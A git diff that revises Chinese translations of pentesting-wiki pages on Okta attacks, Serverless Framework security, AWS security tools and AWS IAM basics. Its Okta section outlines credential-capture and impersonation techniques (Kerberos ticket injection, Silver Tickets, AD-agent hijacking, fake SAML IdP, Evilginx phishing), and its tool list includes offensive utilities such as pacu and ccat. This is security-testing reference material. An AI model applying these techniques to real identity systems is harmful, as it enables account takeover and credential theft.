-然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**。
+然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(例如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**。
> [!CAUTION]
> 最强大的角色是 **超级管理员**。
>
-> 如果攻击者以管理员身份破坏 Okta,所有 **信任 Okta 的应用程序** 很可能会 **被破坏**。
+> 如果攻击者以管理员身份破坏 Okta,所有 **信任 Okta 的应用程序** 将很可能 **被破坏**。
## 攻击
### 定位 Okta 门户
-通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.** 的 **变体**。如果找不到,也可能该组织有一个指向 **Okta 门户** 的 **CNAME** 记录,如 **`okta.companyname.com`**。
+通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.** 的 **变体**。如果找不到,也可能该组织有一个 **CNAME** 记录,如 **`okta.companyname.com`** 指向 **Okta 门户**。
### 通过 Kerberos 登录 Okta
-如果 **`companyname.kerberos.okta.com`** 活跃,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 以供 **Windows** 用户使用。要在 AD 中查找 Kerberos 认证的 Okta 用户,请使用 **适当的参数** 运行 **`getST.py`**。在获得 **AD 用户票证** 后,使用 Rubeus 或 Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` 在 Internet 选项的 "内部网" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。
+如果 **`companyname.kerberos.okta.com`** 是活动的,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 对于 **Windows** 用户。要在 AD 中查找 Kerberos 身份验证的 Okta 用户,请使用 **`getST.py`** 运行 **适当的参数**。在获得 **AD 用户票证** 后,使用 Rubeus 或 Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` 在 Internet 选项的 "Intranet" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。
-破坏 **Okta 服务帐户与委派 SPN 使得银票攻击成为可能**。然而,Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。
+破坏 **Okta 服务帐户与委派 SPN 使得 Silver Ticket 攻击成为可能**。然而,Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
### 劫持 Okta AD 代理
-该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken,攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** 和 **捕获用户凭据** 在 Okta 身份验证过程中的明文,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。
+该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken,攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** 和 **捕获用户凭据** 在 Okta 身份验证过程中以明文形式,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
### 作为管理员劫持 AD
-该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用的自动化工具可以简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。
+该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用自动化工具来简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
@@ -65,7 +65,7 @@ Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品
**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。**
-该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP,随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP,操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能不会被注意。
+该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP,随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP,操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能在不被注意的情况下进行。
### 使用 Evilgnix 针对 Okta 门户的钓鱼
@@ -77,8 +77,8 @@ Okta 的旗舰产品是 **Okta Identity Cloud**。该平台包含一系列产品
因此,如果该应用程序信任字段 **`userName`**,您可能无法更改它(因为通常无法更改该字段),但如果它信任例如 **`primaryEmail`**,您可能能够 **将其更改为同事的电子邮件地址** 并冒充它(您需要访问该电子邮件并接受更改)。
-请注意,这种冒充取决于每个应用程序的配置。只有信任您修改的字段并接受更新的应用程序将受到影响。\
-因此,如果存在,该应用程序应启用此字段:
+请注意,这种冒充取决于每个应用程序的配置。只有那些信任您修改的字段并接受更新的应用程序将受到影响。\
+因此,该应用程序应该启用此字段(如果存在):
.png)
.png)
.png)
.png)
-
Function
+功能
-一个 **Function** 代表一个单一的无服务器函数,例如 AWS Lambda 函数。它包含响应事件时执行的代码。 +一个 **Function** 代表一个单一的无服务器函数,例如 AWS Lambda 函数。它包含在响应事件时执行的代码。 它在 `serverless.yml` 的 `functions` 部分下定义,指定处理程序、运行时、事件、环境变量和其他设置。 ```yaml @@ -50,9 +50,9 @@ method: get事件
-**事件** 是触发您无服务器函数的触发器。它们定义了函数应该如何以及何时执行。 +**事件** 是触发您无服务器函数的触发器。它们定义了函数应该如何和何时执行。 -常见的事件类型包括 HTTP 请求、计划事件(cron 作业)、数据库事件、文件上传等。 +常见的事件类型包括 HTTP 请求、计划事件(定时任务)、数据库事件、文件上传等。 ```yaml functions: hello: @@ -140,7 +140,7 @@ plugins:层
-**层** 允许您将共享代码或依赖项单独打包和管理。这促进了可重用性并减少了部署包的大小。它们在 `layers` 部分下定义,并由函数引用。 +**层** 允许您将共享代码或依赖项与您的函数分开打包和管理。这促进了可重用性并减少了部署包的大小。它们在 `layers` 部分定义,并由函数引用。 ```yaml layers: commonLibs: @@ -241,9 +241,9 @@ TABLE_NAME: ${self:custom.tableName}
-/settings/providers?providerId=new&provider=aws` 的 **仪表板**。
-1. 为了给 `serverless.com` 访问 AWS 的权限,它会要求运行一个 cloudformation 堆栈,使用这个配置文件(在撰写本文时):[https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
+4. 创建一个 AWS 提供者,进入 **dashboard** 在 `https://app.serverless.com//settings/providers?providerId=new&provider=aws`。
+1. 为了给 `serverless.com` 访问 AWS 的权限,它会要求运行一个 cloudformation stack,使用这个配置文件(在撰写本文时): [https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml](https://serverless-framework-template.s3.amazonaws.com/roleTemplate.yml)
2. 这个模板生成一个名为 **`SFRole-`** 的角色,具有 **`arn:aws:iam::aws:policy/AdministratorAccess`** 的权限,允许 `Serverless.com` AWS 账户访问该角色。
依赖
+依赖项
-**依赖** 管理您的函数所需的外部库和模块。它们通常通过像 npm 或 pip 这样的包管理器处理,并使用 `serverless-webpack` 等工具或插件与您的部署包捆绑在一起。 +**依赖项** 管理您的函数所需的外部库和模块。它们通常通过像 npm 或 pip 这样的包管理器处理,并使用 `serverless-webpack` 等工具或插件与您的部署包捆绑在一起。 ```yaml plugins: - serverless-webpack @@ -284,7 +284,7 @@ serverless #Choose first one (AWS / Node.js / HTTP API) ## Create A New App ## Indicate a name like "tutorialapp) ``` -这应该创建了一个名为 **app** 的 `tutorialapp`,您可以在 [serverless.com](serverless.com-security.md) 中检查,并且创建了一个名为 `Tutorial` 的文件夹,其中包含文件 **`handler.js`**,该文件包含一些 JS 代码和 `helloworld` 代码,以及文件 **`serverless.yml`** 声明该函数: +这应该创建一个名为 **app** 的 `tutorialapp`,您可以在 [serverless.com](serverless.com-security.md) 中检查,并创建一个名为 `Tutorial` 的文件夹,其中包含文件 **`handler.js`**,该文件包含一些 JS 代码和 `helloworld` 代码,以及文件 **`serverless.yml`** 声明该函数: {{#tabs }} {{#tab name="handler.js" }} @@ -323,8 +323,8 @@ method: get {{#endtab }} {{#endtabs }} -4. 创建一个 AWS 提供者,进入 `https://app.serverless.com/
@@ -483,7 +483,7 @@ TableName: ${self:service}-customerTable-${sls:stage}
6. 部署它运行 **`serverless deploy`**
1. 部署将通过 CloudFormation Stack 执行
-2. 请注意,**lambdas 通过 API gateway 暴露,而不是通过直接 URL**
+2. 请注意,**lambdas 通过 API gateway 暴露**,而不是通过直接 URL
7. **测试它**
1. 上一步将打印出 **URLs**,您的 API 端点 lambda 函数已部署在这些地址
@@ -493,7 +493,7 @@ TableName: ${self:service}-customerTable-${sls:stage}
过于宽松的 IAM 角色可能会授予对云资源的未经授权访问,从而导致数据泄露或资源操控。
-当没有为 Lambda 函数指定权限时,将创建一个仅具有生成日志权限的角色,如下所示:
+当没有为 Lambda 函数指定权限时,将创建一个仅具有生成日志权限的角色,如:
 (1) (1) (1) (1) (1).png)
.png)
aws_recon \
--regions global,us-east-1,us-east-2 \
--verbose
```
-- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于获取资产**(主机名,IP 地址)来自云服务提供商。
-- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的亚马逊网络服务(AWS)环境。它现在包含更多功能,包括安全问题的审计。
+- [**cloudlist**](https://github.com/projectdiscovery/cloudlist): Cloudlist 是一个 **多云工具,用于从云提供商获取资产**(主机名、IP 地址)。
+- [**cloudmapper**](https://github.com/duo-labs/cloudmapper): CloudMapper 帮助您分析您的 Amazon Web Services (AWS) 环境。它现在包含更多功能,包括安全问题的审计。
```bash
# Installation steps in github
# Create a config.json file with the aws info, like:
@@ -233,15 +233,15 @@ pip install cartography
# Get AWS info
AWS_PROFILE=dev cartography --neo4j-uri bolt://127.0.0.1:7687 --neo4j-password-prompt --neo4j-user neo4j
```
-- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,形成一个直观的图形视图,支持 Neo4j 数据库。
-- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个工具,尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 在一个账户中创建的。
+- [**starbase**](https://github.com/JupiterOne/starbase): Starbase 收集来自服务和系统的资产和关系,包括云基础设施、SaaS 应用程序、安全控制等,呈现为一个直观的图形视图,支持 Neo4j 数据库。
+- [**aws-inventory**](https://github.com/nccgroup/aws-inventory): (使用 python2) 这是一个工具,尝试 **发现所有** [**AWS 资源**](https://docs.aws.amazon.com/general/latest/gr/glos-chap.html#resource) 在一个账户中创建的资源。
- [**aws_public_ips**](https://github.com/arkadiyt/aws_public_ips): 这是一个工具,用于 **获取与 AWS 账户关联的所有公共 IP 地址**(包括 IPv4/IPv6)。
### Privesc & Exploiting
- [**SkyArk**](https://github.com/cyberark/SkyArk)**:** 发现扫描的 AWS 环境中最特权的用户,包括 AWS Shadow Admins。它使用 powershell。您可以在 [https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1](https://github.com/cyberark/SkyArk/blob/master/AWStealth/AWStealth.ps1) 的 **`Check-PrivilegedPolicy`** 函数中找到 **特权策略的定义**。
-- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** 并 **利用** 它们。您可以在 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 的 **`user_escalation_methods`** 字典中找到 **特权权限的定义**。
-- 请注意,pacu **仅检查您自己的 privescs 路径**(而不是账户范围内)。
+- [**pacu**](https://github.com/RhinoSecurityLabs/pacu): Pacu 是一个开源的 **AWS 利用框架**,旨在针对云环境进行攻击性安全测试。它可以 **枚举**、查找 **错误配置** 并 **利用** 它们。您可以在 **`user_escalation_methods`** 字典中找到 [https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam\_\_privesc_scan/main.py#L134](https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__privesc_scan/main.py#L134) 中 **特权权限的定义**。
+- 请注意,pacu **仅检查您自己的 privescs 路径**(而不是账户范围内的)。
```bash
# Install
## Feel free to use venvs
@@ -278,7 +278,7 @@ pmapper --profile dev orgs create
pmapper --profile dev orgs display
```
- [**cloudsplaining**](https://github.com/salesforce/cloudsplaining): Cloudsplaining 是一个 AWS IAM 安全评估工具,识别最小权限的违规行为并生成风险优先级的 HTML 报告。\
-它将向您显示潜在的 **过度权限** 客户、内联和 aws **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。
+它将向您展示潜在的 **过度权限** 客户、内联和 AWS **策略** 以及哪些 **主体可以访问它们**。 (它不仅检查权限提升,还检查其他有趣的权限,建议使用)。
```bash
# Install
pip install cloudsplaining
@@ -291,12 +291,12 @@ cloudsplaining download --profile dev
cloudsplaining scan --input-file /private/tmp/cloudsplaining/dev.json --output /tmp/files/
```
- [**cloudjack**](https://github.com/prevade/cloudjack): CloudJack 评估 AWS 账户的 **子域劫持漏洞**,这是由于 Route53 和 CloudFront 配置的解耦造成的。
-- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门化镜像
+- [**ccat**](https://github.com/RhinoSecurityLabs/ccat): 列出 ECR 仓库 -> 拉取 ECR 仓库 -> 后门化 -> 推送后门镜像
- [**Dufflebag**](https://github.com/bishopfox/dufflebag): Dufflebag 是一个工具,**搜索**公共弹性块存储 (**EBS**) 快照中的秘密,这些秘密可能被意外遗留。
### 审计
-- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 开发,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub(它不查找 ShadowAdmins)。
+- [**cloudsploit**](https://github.com/aquasecurity/cloudsploit)**:** CloudSploit 由 Aqua 提供,是一个开源项目,旨在检测云基础设施账户中的 **安全风险**,包括:亚马逊网络服务 (AWS)、微软 Azure、谷歌云平台 (GCP)、甲骨文云基础设施 (OCI) 和 GitHub(它不查找 ShadowAdmins)。
```bash
./index.js --csv=file.csv --console=table --config ./config.js
@@ -318,7 +318,7 @@ prowler aws --profile custom-profile [-M csv json json-asff html]
```bash
cloudfox aws --profile [profile-name] all-checks
```
-- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够对云环境进行安全态势评估。
+- [**ScoutSuite**](https://github.com/nccgroup/ScoutSuite): Scout Suite 是一个开源的多云安全审计工具,能够评估云环境的安全态势。
```bash
# Install
virtualenv -p python3 venv
@@ -334,9 +334,9 @@ scout aws -p dev
### 持续审计
-- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义策略以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。
-- [**pacbot**](https://github.com/tmobile/pacbot)**: 代码即政策机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化** 的平台。在 PacBot 中,安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估,以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义措施自动响应政策违规的能力。
-- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数 TB 的日志数据以进行事件检测和响应。
+- [**cloud-custodian**](https://github.com/cloud-custodian/cloud-custodian): Cloud Custodian 是一个用于管理公共云账户和资源的规则引擎。它允许用户 **定义政策以启用良好管理的云基础设施**,既安全又成本优化。它将组织中许多临时脚本整合为一个轻量级和灵活的工具,具有统一的指标和报告。
+- [**pacbot**](https://github.com/tmobile/pacbot)**: 政策即代码机器人 (PacBot)** 是一个用于 **持续合规监控、合规报告和云安全自动化**的平台。在 PacBot 中,安全和合规政策以代码形式实现。PacBot 发现的所有资源都根据这些政策进行评估,以衡量政策符合性。PacBot **自动修复** 框架提供了通过采取预定义行动自动响应政策违规的能力。
+- [**streamalert**](https://github.com/airbnb/streamalert)**:** StreamAlert 是一个无服务器的 **实时** 数据分析框架,使您能够 **摄取、分析和警报** 来自任何环境的数据,**使用您定义的数据源和警报逻辑**。计算机安全团队使用 StreamAlert 每天扫描数TB的日志数据以进行事件检测和响应。
## DEBUG: 捕获 AWS cli 请求
```bash
diff --git a/src/pentesting-cloud/aws-security/aws-basic-information/README.md b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
index 2b318a3ca..7affe839e 100644
--- a/src/pentesting-cloud/aws-security/aws-basic-information/README.md
+++ b/src/pentesting-cloud/aws-security/aws-basic-information/README.md
@@ -10,7 +10,7 @@
在 AWS 中有一个 **根账户,** 它是您 **组织中所有账户的父容器**。然而,您不需要使用该账户来部署资源,您可以创建 **其他账户以将不同的 AWS** 基础设施分开。
-从 **安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),因此您可以在部署之间创建边界。
+从 **安全** 的角度来看,这非常有趣,因为 **一个账户无法访问其他账户的资源**(除非专门创建了桥接),这样您可以在部署之间创建边界。
因此,在一个组织中有 **两种类型的账户**(我们谈论的是 AWS 账户,而不是用户账户):一个被指定为管理账户的单一账户,以及一个或多个成员账户。
@@ -27,7 +27,7 @@
管理账户具有 **付款账户的责任**,并负责支付所有由成员账户产生的费用。您无法更改组织的管理账户。
- **成员账户** 组成了组织中所有其他账户。一个账户一次只能是一个组织的成员。您可以将政策附加到一个账户,以仅对该账户应用控制。
-- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,通常他们将无法管理账单(但可能会被授予访问权限)。
+- 成员账户 **必须使用有效的电子邮件地址**,并可以有一个 **名称**,一般来说,他们将无法管理账单(但可能会被授予访问权限)。
```
aws organizations create-account --account-name testingaccount --email testingaccount@lalala1233fr.com
```
@@ -40,10 +40,10 @@ aws organizations create-organizational-unit --parent-id r-lalala --name TestOU
```
### Service Control Policy (SCP)
-一个 **服务控制策略 (SCP)** 是一种策略,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP **类似于 IAM** 权限策略,但它们 **不授予任何权限**。相反,SCP 指定了组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到您的组织根或 OU 时,**SCP 限制成员账户中实体的权限**。
+**服务控制策略 (SCP)** 是一种策略,指定用户和角色在受 SCP 影响的账户中可以使用的服务和操作。SCP **类似于 IAM** 权限策略,但它们 **不授予任何权限**。相反,SCP 指定组织、组织单位 (OU) 或账户的 **最大权限**。当您将 SCP 附加到组织根或 OU 时,**SCP 限制成员账户中实体的权限**。
这是 **即使是根用户也无法被阻止** 执行某些操作的唯一方法。例如,它可以用于阻止用户禁用 CloudTrail 或删除备份。\
-绕过此限制的唯一方法是同时攻陷配置 SCP 的 **主账户**(主账户无法被阻止)。
+绕过此限制的唯一方法是同时妥协配置 SCP 的 **主账户**(主账户无法被阻止)。
> [!WARNING]
> 请注意,**SCP 仅限制账户中的主体**,因此其他账户不受影响。这意味着拥有一个 SCP 拒绝 `s3:GetObject` 不会阻止人们 **访问您账户中的公共 S3 存储桶**。
@@ -69,7 +69,7 @@ SCP 示例:
arn:partition:service:region:account-id:resource-type/resource-id
arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
```
-注意,AWS中有4个分区,但只有3种调用方式:
+注意,AWS 中有 4 个分区,但只有 3 种调用它们的方法:
- AWS Standard: `aws`
- AWS China: `aws-cn`
@@ -78,51 +78,51 @@ arn:aws:elasticbeanstalk:us-west-1:123456789098:environment/App/Env
## IAM - 身份和访问管理
-IAM是允许您管理**身份验证**、**授权**和**访问控制**的服务。
+IAM 是允许您管理 **身份验证**、**授权**和 **访问控制** 的服务。
- **身份验证** - 定义身份和验证该身份的过程。此过程可以细分为:识别和验证。
- **授权** - 确定身份在系统中经过身份验证后可以访问的内容。
-- **访问控制** - 授予安全资源访问权限的方法和过程。
+- **访问控制** - 授予对安全资源访问的方式和过程。
-IAM可以通过其管理、控制和治理身份对您AWS账户内资源的身份验证、授权和访问控制机制的能力来定义。
+IAM 可以通过其管理、控制和治理身份对您 AWS 账户内资源的身份验证、授权和访问控制机制的能力来定义。
-### [AWS账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
+### [AWS 账户根用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html)
-当您首次创建Amazon Web Services (AWS)账户时,您将拥有一个具有**完全访问所有**AWS服务和资源的单一登录身份。这是AWS账户的_**根用户**_,通过使用**您用于创建账户的电子邮件地址和密码**进行登录。
+当您首次创建 Amazon Web Services (AWS) 账户时,您将拥有一个具有 **完全访问所有** AWS 服务和资源的单一登录身份。这是 AWS 账户的 _**根用户**_,通过使用 **您用于创建账户的电子邮件地址和密码** 登录访问。
-请注意,新创建的**管理员用户**将具有**比根用户更少的权限**。
+请注意,新创建的 **管理员用户** 的 **权限将少于根用户**。
从安全的角度来看,建议创建其他用户并避免使用此用户。
-### [IAM用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
+### [IAM 用户](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_users.html)
-IAM_用户_是您在AWS中创建的实体,用于**代表使用它与AWS交互的人员或应用程序**。AWS中的用户由名称和凭据(密码和最多两个访问密钥)组成。
+IAM _用户_ 是您在 AWS 中创建的实体,用于 **代表使用它与 AWS 交互的人员或应用程序**。AWS 中的用户由名称和凭据(密码和最多两个访问密钥)组成。
-当您创建IAM用户时,您通过将其设置为具有适当权限策略的**用户组成员**(推荐)或**直接将策略附加**到用户来授予其**权限**。
+当您创建 IAM 用户时,您通过将其设置为具有适当权限策略的 **用户组的成员**(推荐)或 **直接将策略附加** 到用户来授予其 **权限**。
-用户可以启用**MFA登录**控制台。启用MFA的用户的API令牌不受MFA保护。如果您想要**使用MFA限制用户的API密钥访问**,您需要在策略中指明为了执行某些操作需要MFA(示例[**在这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。
+用户可以启用 **MFA 登录** 控制台。启用 MFA 的用户的 API 令牌不受 MFA 保护。如果您想要 **使用 MFA 限制用户的 API 密钥访问**,您需要在策略中指明为了执行某些操作需要 MFA(示例 [**这里**](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa_configure-api-require.html))。
#### CLI
-- **访问密钥ID**:20个随机的大写字母数字字符,如AKHDNAPO86BSHKDIRYT
-- **秘密访问密钥ID**:40个随机的大小写字符:S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU(无法检索丢失的秘密访问密钥ID)。
+- **访问密钥 ID**:20 个随机大写字母数字字符,如 AKHDNAPO86BSHKDIRYT
+- **秘密访问密钥 ID**:40 个随机大小写字符:S836fh/J73yHSb64Ag3Rkdi/jaD6sPl6/antFtU(无法检索丢失的秘密访问密钥 ID)。
-每当您需要**更改访问密钥**时,您应遵循以下过程:\
+每当您需要 **更改访问密钥** 时,您应遵循以下过程:\
&#xNAN;_Create a new access key -> Apply the new key to system/application -> mark original one as inactive -> Test and verify new access key is working -> Delete old access key_
### MFA - 多因素身份验证
-它用于**创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\
-您可以使用**免费的虚拟应用程序或物理设备**。您可以使用像Google身份验证器这样的应用程序免费激活AWS中的MFA。
+它用于 **创建额外的身份验证因素**,以补充您现有的方法,例如密码,从而创建多因素身份验证级别。\
+您可以使用 **免费的虚拟应用程序或物理设备**。您可以使用 Google 身份验证等应用程序免费激活 AWS 中的 MFA。
-带有MFA条件的策略可以附加到以下内容:
+带有 MFA 条件的策略可以附加到以下内容:
-- IAM用户或组
-- 资源,例如Amazon S3桶、Amazon SQS队列或Amazon SNS主题
-- 可以被用户假设的IAM角色的信任策略
+- IAM 用户或组
+- 资源,例如 Amazon S3 存储桶、Amazon SQS 队列或 Amazon SNS 主题
+- 可以被用户假设的 IAM 角色的信任策略
-如果您想要**通过CLI访问**一个**检查MFA**的资源,您需要调用**`GetSessionToken`**。这将为您提供一个包含MFA信息的令牌。\
-请注意,**`AssumeRole`凭据不包含此信息**。
+如果您想要 **通过 CLI 访问** 检查 **MFA** 的资源,您需要调用 **`GetSessionToken`**。这将为您提供一个包含 MFA 信息的令牌。\
+请注意 **`AssumeRole` 凭据不包含此信息**。
```bash
aws sts get-session-token --serial-number --token-code
@@ -551,28 +551,28 @@ Resource: arn:aws:dynamodb:${aws:region}:${aws:accountId}:table/${self:service}-
### **不安全的秘密和配置管理**
-将敏感信息(例如,API 密钥、数据库凭据)直接存储在 **`serverless.yml`** 或代码中,如果存储库被攻破,可能会导致泄露。
+将敏感信息(例如,API 密钥、数据库凭据)直接存储在 **`serverless.yml`** 或代码中,如果存储库被泄露,可能会导致暴露。
-在 **`serverless.yml`** 文件中存储环境变量的 **推荐** 方法是使用 `ssm` 或 `s3` 提供者,这允许在部署时从这些来源获取 **环境值** 并 **配置** **lambdas** 的环境变量,**文本中不包含值**!
+在撰写本文时,**推荐**的在 **`serverless.yml`** 文件中存储环境变量的方法是使用 `ssm` 或 `s3` 提供程序,这允许在部署时从这些来源获取 **环境值** 并 **配置** **lambdas** 的环境变量,**文本中不包含值**!
> [!CAUTION]
> 因此,任何有权限读取 AWS 中 lambdas 配置的人都将能够 **以明文访问所有这些环境变量!**
-例如,以下示例将使用 SSM 获取一个环境变量:
+例如,以下示例将使用 SSM 获取环境变量:
```yaml
provider:
environment:
DB_PASSWORD: ${ssm:/aws/reference/secretsmanager/my-db-password~true}
```
-And even if this prevents hardcoding the environment variable value in the **`serverless.yml`** file, the value will be obtained at deployment time and will be **以明文形式添加到lambda环境变量中**。
+即使这可以防止在 **`serverless.yml`** 文件中硬编码环境变量值,但该值将在部署时获取,并将**以明文形式添加到 lambda 环境变量中**。
> [!TIP]
-> 使用serveless.com存储环境变量的推荐方法是**将其存储在AWS秘密中**,并仅在环境变量中存储秘密名称,**lambda代码应收集它**。
+> 使用 serveless.com 存储环境变量的推荐方法是**将其存储在 AWS 秘密中**,并仅在环境变量中存储秘密名称,**lambda 代码应收集它**。
#### **缓解策略**
-- **秘密管理器集成:** 使用像**AWS Secrets Manager**这样的服务。
-- **加密变量:** 利用Serverless Framework的加密功能来保护敏感数据。
+- **Secrets Manager 集成:** 使用像 **AWS Secrets Manager** 这样的服务。
+- **加密变量:** 利用 Serverless Framework 的加密功能来保护敏感数据。
- **访问控制:** 根据角色限制对秘密的访问。
---
@@ -592,7 +592,7 @@ plugins:
```
- **输入验证:** 实施严格的验证和清理所有输入。
-- **代码审查:** 进行彻底的审查以识别安全缺陷。
+- **代码审查:** 进行全面审查以识别安全缺陷。
- **静态分析:** 使用工具检测代码库中的漏洞。
---
@@ -603,7 +603,7 @@ plugins:
#### **缓解策略**
-- **集中日志记录:** 使用像**AWS CloudWatch**或**Datadog**这样的服务聚合日志。
+- **集中日志记录:** 使用像 **AWS CloudWatch** 或 **Datadog** 这样的服务聚合日志。
```yaml
plugins:
@@ -611,18 +611,18 @@ plugins:
```
